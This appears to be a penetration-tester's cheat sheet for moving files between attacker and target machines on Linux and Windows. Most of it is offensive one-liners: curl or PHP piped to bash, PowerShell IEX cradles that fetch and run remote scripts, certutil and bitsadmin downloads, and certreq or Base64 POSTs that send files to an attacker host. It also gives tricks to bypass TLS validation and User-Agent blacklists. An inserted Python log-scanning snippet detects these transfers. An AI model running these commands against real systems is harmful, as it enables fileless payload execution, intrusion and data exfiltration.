
Living off The Land Binaries

Resources and Filters
LOLBAS → /download, /upload
GTFOBins → +file download, +file upload

File Transfer Servers

TCP
Netcat
nc -nlvp <PORT> > <FILE>
nc -nlvp <PORT> < <FILE>
Ncat
ncat -nlvp <PORT> --recv-only > <FILE>
ncat -nlvp <PORT> --send-only < <FILE>
HTTP
Simple HTTP Servers


  • Python3
python3 -m http.server <PORT>
  • Python2.7
python2.7 -m SimpleHTTPServer <PORT>
  • NodeJS
npx http-server <DIRECTORY> -o -p 1234
  • PHP
php -S 0.0.0.0:1234
  • Ruby
ruby -run -ehttpd . -p<PORT>
HTTP Server for Uploads
  • Python3


python3 -m venv venv
source !$/bin/activate # !$ expands to the last argument of the previous command (venv)
pip3 install uploadserver
python3 -m uploadserver <PORT>
SMB
Smbserver (Impacket)


smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>
FTP
python3 -m venv venv
source !$/bin/activate # !$ expands to the last argument of the previous command (venv)
pip3 install pyftpdlib
python3 -m pyftpdlib --port 21 --write

The --write option grants write permission on the served directory, so FTP clients can upload


Linux File Transfer Agents

TCP
Netcat
nc -q 0 <TARGET> <PORT> < <FILE>
Ncat
ncat --send-only <TARGET> <PORT> < <FILE>
Cat + Bash /dev/tcp
bash -c 'cat <FILE> > /dev/tcp/<TARGET>/<PORT>'
HTTP
Wget
  • Same Name as Origin
wget <URL>
  • Different Name as Origin
wget --output-document "<FILE>" "<URL>" # Long Format
wget -O "<FILE>" "<URL>" # Short Format
Curl
  • Same Name as Origin
curl --silent --request GET --location --remote-name "<URL>" # Long Format
curl -sX GET -LO "<URL>" # Short Format
  • Different Name as Origin
curl --silent --request GET --location --output "<FILE>" "<URL>" # Long Format
curl -sX GET -Lo "<FILE>" "<URL>" # Short Format
  • Fileless
bash
curl --silent --request GET --location "http[s]://<TARGET>:<PORT>/<FILE>.bash" | bash
python
curl --silent --request GET --location "http[s]://<TARGET>:<PORT>/<FILE>.py" | python3
  • Upload Files to a Web Server

First, build the HTTP Server for Uploads

curl --silent --location --request POST --insecure --form 'files=@<FILE>' 'http[s]://<TARGET>:<PORT>/upload'
Bash /dev/tcp
exec 3<> /dev/tcp/<IP_ADDRESS>/<PORT>
printf "GET /<FILE> HTTP/1.1\n\n" >&3
cat <&3 > <FILE> # The saved file begins with the HTTP response headers; strip everything up to the first blank line
Python
  • Python3
python3 -c 'import urllib.request; urllib.request.urlretrieve("<URL>", "<OUTPUT_FILE>")'
  • Python2.7
python2.7 -c 'import urllib; urllib.urlretrieve("<URL>", "<OUTPUT_FILE>")'
  • Upload Files to a Web Server

First, build the HTTP Server for Uploads

python3 -c 'import requests; requests.post("<URL>",files={"files":open("<FILE>","rb")})'
PHP
  • file_get_contents() + file_put_contents()
php -r '$file = file_get_contents("<URL>"); file_put_contents("<OUTPUT_FILE>",$file);'
  • fopen()
php -r 'const BUFFER = 1024; $fremote =  fopen("<URL>", "rb"); $flocal = fopen("<OUTPUT_FILE>", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
  • Fileless
bash
php -r '$lines = @file("<URL>"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
Ruby
ruby -e 'require "net/http"; File.write("<OUTPUT_FILE>", Net::HTTP.get(URI.parse("<URL>")))'
Perl
perl -e 'use LWP::Simple; getstore("<URL>", "<OUTPUT_FILE>");'
SSH

If SSH access to the target is available, use SCP or SFTP as follows →

SCP
Attacker
scp -P<PORT> /path/to/local/resource <USER>@<TARGET>:/destination/path
SFTP
Attacker
sftp -P<PORT> <USER>@<TARGET>
Inside the SFTP session
cd /destination/path # Remote Path
put /path/to/local/resource
exit
FTP
FTP
ftp <FTP_SERVER>
LFTP
  • Interactive
lftp -u <USER>,<PASSWORD> <FTP_SERVER>
  • Non-Interactive
lftp -u <USER>,<PASSWORD> <FTP_SERVER> -e '<FTP_COMMANDS>; bye'
TLS
OpenSSL


  • From the Attacker ⚔️
openssl req -x509 -newkey rsa:4096 -noenc -keyout key.pem -out cert.pem -days 365
openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT> < <FILE>
  • From the Target 🎯
openssl s_client -quiet -connect <ATTACKER>:<PORT> > <OUTPUT_FILE>
Base64


Encode the file content to Base64
Attacker
base64 -w 0 <INPUT_FILE>
Decode the Base64 string
base64 -d <<< "<BASE64_STRING>" > <OUTPUT_FILE>
File Transfer Validation
Check File Type transferred
file <FILE>
Check File Integrity

Run the same command on both the Attacker and the Target hosts and compare the hashes

md5sum <FILE>
sha256sum <FILE>
sha512sum <FILE>

Windows File Transfer Agents

HTTP

Harmj0y

Certutil.exe


  • Download File
certutil.exe -urlcache -split -f '<URL>' '<OUTPUT_FILE>'
certutil.exe -verifyctl -split -f '<URL>' '<OUTPUT_FILE>'
WinHTTPRequest

COM

  • Fileless
$r = New-Object -ComObject WinHTTP.WinHTTPRequest.5.1
$r.open('GET', '<URL>', $false)
$r.send()
IEX $r.ResponseText
MSXML2

COM

  • Fileless
$r = New-Object -ComObject msxml2.XMLHTTP
$r.open('GET', '<URL>', $false)
$r.send()
IEX $r.ResponseText
Invoke-WebRequest

PowerShell v3.0 and later

  • Download File
IWR -UseBasicParsing -Uri '<URL>' -OutFile '.\<OUTPUT_FILE>' # Or Invoke-WebRequest
  • Fileless
IEX (IWR -UseBasicParsing -Uri '<URL>') # Or Invoke-Expression (Invoke-WebRequest <ARGS>)
  • SSL/TLS Certificate Validation Bypass
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  • User-Agent Blacklist Bypass

List all standard User-Agents built into PowerShell as follows

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Set one of the above User-Agents as the value of the -UserAgent parameter of Invoke-WebRequest

$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome # Chrome User-Agent
IEX (IWR -UseBasicParsing -Uri '<URL>' -UserAgent $UserAgent)
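An added detection-side example, not part of this cheat sheet: a Python scan of constructed web-server access-log lines that flags the default User-Agent strings of the download cradles and LOLBins listed on this page (the ones a -UserAgent override replaces), plus the path and upload-endpoint signals that survive such an override. The log lines and the indicator lists are assumptions.

```python
import re

# Constructed sample web-server access log (combined format); not captured from any real host.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /nc.exe HTTP/1.1" 200 40960 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /tool.exe HTTP/1.1" 200 40960 "-" "Microsoft-CryptoAPI/10.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /notes.txt HTTP/1.1" 200 40 "-" "Microsoft BITS/7.8"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "POST /upload HTTP/1.1" 200 12 "-" "curl/8.4.0"
"""

# Default User-Agent substrings of the agents on this page (assumed indicator list, not exhaustive).
# Net.WebClient sends no User-Agent at all and -UserAgent replaces the PowerShell default,
# so a browser-looking or empty UA is not proof of a browser; the path checks below still apply.
SUSPICIOUS_UA = {
    "WindowsPowerShell/": "powershell_cradle",    # Invoke-WebRequest / Invoke-RestMethod default
    "Microsoft-CryptoAPI/": "certutil_download",  # certutil.exe -urlcache / -verifyctl
    "Microsoft BITS/": "bits_transfer",           # bitsadmin.exe / Start-BitsTransfer
    "Python-urllib/": "python_urlretrieve",       # urllib.request.urlretrieve default
    "Wget/": "wget_download",
    "curl/": "curl_download",
}
# Content a file-transfer agent typically fetches or pushes.
TOOL_EXT = (".exe", ".dll", ".ps1", ".bat", ".sh", ".py", ".bash")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def classify(entry):
    """Return the reasons a parsed log entry looks like a scripted file transfer, or []."""
    reasons = [tag for needle, tag in SUSPICIOUS_UA.items() if needle in entry["ua"]]
    if entry["path"].lower().endswith(TOOL_EXT):
        reasons.append("tool_extension")
    if entry["method"] == "POST" and entry["path"].endswith("/upload"):
        reasons.append("upload_endpoint")
    return reasons

def find_transfers(log_text):
    """Parse combined-format lines and return those matching at least one transfer indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        entry = m.groupdict()
        reasons = classify(entry)
        if reasons:
            hits.append({"ip": entry["ip"], "path": entry["path"], "ua": entry["ua"], "reasons": reasons})
    return hits

if __name__ == "__main__":
    for h in find_transfers(SAMPLE_LOG):
        print(h["ip"], h["path"], ",".join(h["reasons"]))
```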
Invoke-RestMethod

PowerShell v3.0 and later

  • Download File
IRM -UseBasicParsing -Uri '<URL>' -OutFile '<OUTPUT_FILE>' # Or Invoke-RestMethod
  • Fileless
IEX (IRM -UseBasicParsing -Uri '<URL>')
Net.WebClient

.NET

  • Download File
(New-Object Net.WebClient).DownloadString('<URL>') > .\<FILE>
(New-Object Net.WebClient).DownloadFile('<URL>', '<OUTPUT_FILE>')
(New-Object Net.WebClient).DownloadFileAsync('<URL>', '<OUTPUT_FILE>')
  • Fileless
IEX (New-Object Net.WebClient).DownloadString('<URL>')
(New-Object Net.WebClient).DownloadString('<URL>') | IEX
PSUpload.ps1


First, build the HTTP Server for Uploads

  • Download and Run Powershell Module for Web Uploads
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/refs/heads/master/Powershell/PSUpload.ps1')
  • Upload a File to the HTTP Upload Server
Invoke-FileUpload -Uri 'http://<TARGET>:<PORT>/upload' -File '<LOCAL_FILE_TO_UPLOAD>' # File's Full Path
Invoke-WebRequest + Base64-Encoded HTTP POST Body
  • From the Attacker ⚔️
nc -nlvp 443
  • From The Target 🎯
Invoke-WebRequest -UseBasicParsing -Uri 'http://<TARGET>:<PORT>' -Method POST -Body ([Convert]::ToBase64String([System.IO.File]::ReadAllBytes('<FILE>'))) # File's Full Path
Certreq.exe


  • Upload a File's Content via the Body of an HTTP POST Request
Attacker
nc -nlvp <PORT>
Target
certreq.exe -Post -config http[s]://<ATTACKER_IP>:<PORT>/ <LOCAL_FILE>
BITS


  • Bitsadmin.exe
bitsadmin.exe /transfer wcb /priority foreground "http://<ATTACKER_IP>:<PORT>/<RESOURCE>" "<OUTPUT_FILE>" # File's Full Path
  • Powershell
Import-Module bitstransfer ; Start-BitsTransfer -Source "http://<ATTACKER_IP>:<PORT>/<RESOURCE>" -Destination "<OUTPUT_FILE>" # File's Full Path
SMB

First, an SMB Server has to be deployed at one of the endpoints

Net use

CMD & PS

net use <NETWORK_DRIVE_LETTER> \\<ATTACKER>\<SHARE_NAME> /USER:<USER> <PASSWORD>
New-PSDrive

PS

$Passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$Cred = New-Object PSCredential("<USER>", $Passwd)
New-PSDrive -Name <NAME> -PSProvider FileSystem -Root "\\<ATTACKER>\<SHARE_NAME>" -Credential $Cred
FTP
Net.WebClient

First, build an FTP Server

  • Download File
(New-Object Net.WebClient).DownloadFile('ftp://<FTP_SERVER>/<FILE>', '<OUTPUT_FILE>')
  • Upload File
(New-Object Net.WebClient).UploadFile('ftp://<FTP_SERVER>/<UPLOAD_PATH>', '<FILE>') # File's Full Path
RDP

Network Path of the Shared Folder via RDP → \\tsclient\linux

RDesktop
rdesktop <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -r disk:linux='<LOCAL_FOLDER>'
XFreeRDP
xfreerdp /v:<TARGET> /d:<DOMAIN> /u:<USER> /p:'<PASSWORD>' /drive:linux,<LOCAL_FOLDER>
Powershell
Powershell Sessions (WinRM)

The current user must have administrator rights on the remote machine or belong to the Remote Management Users group

In addition, the WinRM port, TCP 5985 (HTTP) or 5986 (HTTPS), must be reachable

  • Powershell Session Creation
$Session = New-PSSession -ComputerName <TARGET>
  • Copy a file from Localhost to the Remote Machine Session
Copy-Item -Path "<LOCAL_FILE>" -ToSession $Session -Destination "<REMOTE_PATH>"
  • Copy a file from the Remote Machine Session to the Localhost
Copy-Item -Path "<REMOTE_FILE>" -Destination "<LOCAL_PATH>" -FromSession $Session
Base64
Encode the file content to Base64
  • Powershell (.NET)

PS

[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("<INPUT_FILE_PATH>")) # File's Full Path
  • Certutil.exe

CMD & PS

certutil.exe -encode <INPUT_FILE> <OUTPUT_FILE>
Decode the Base64 string
  • Linux 🐧
base64 -d <<< "<BASE64_STRING>" > /destination/path
  • Windows 🪟
[System.IO.File]::WriteAllBytes("<OUTPUT_FILE_PATH>", [System.Convert]::FromBase64String((Get-Content "<BASE64_FILE_PATH>" -Raw)))
File Transfer Validation

Run the same command on both the Attacker and the Target hosts and compare the hashes

Get-FileHash
Get-FileHash -Algorithm MD5 <FILE> | Select-Object -Property Hash
Get-FileHash -Algorithm SHA256 <FILE> | Select-Object -Property Hash
Get-FileHash -Algorithm SHA512 <FILE> | Select-Object -Property Hash
Certutil.exe
certutil.exe -hashfile <FILE> MD5
certutil.exe -hashfile <FILE> SHA256
certutil.exe -hashfile <FILE> SHA512